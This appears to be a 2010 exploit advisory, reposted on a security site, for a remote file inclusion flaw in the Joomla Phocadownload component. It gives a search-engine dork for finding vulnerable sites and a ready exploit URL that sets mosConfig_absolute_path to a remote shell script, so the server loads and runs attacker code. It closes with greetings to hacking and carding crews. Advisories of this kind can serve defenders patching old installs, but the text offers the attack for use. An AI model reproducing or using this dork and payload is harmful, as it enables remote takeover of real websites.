Joomla Component Phocadownload RFI Vulnerability

2010.11.10
Credit: jos_ali_joe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

========================================================= Joomla Component Phocadownload RFI Vulnerability ========================================================= [+]Title : Joomla Component phocadownload RFI Vulnerability [+]Software : Phocadownload [+]Vendor : http://www.phoca.cz/ [+]Download : http://www.phoca.cz/download/category/4-phoca-download-component [+]Author : jos_ali_joe [+]Contact : josalijoe[at]yahoo[dot]com [+]Home : http://josalijoe.wordpress.com/ .___ .___ .__ _________ .___ | | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______ | | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \ | || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/ |___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__| \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ ######################################################################## Dork : inurl:index.php?option="com_phocadownload" ######################################################################## ------------------------------------------------------------------------ RFI Exploit Exploit : http://example.com/components/com_phocadownload/phocadownload.php?mosConfig_absolute_path=[ Shell txt ] -------------------------------------------------------------------------- Greets For : ./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Security Hub ./Byroe Net - Yogya Carderlink - anten4 - Security Reason - Packetstorm Security My Team : ./Indonesian Coder & inj3ct0r Special Thanks : /. google.com [+] Note : Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top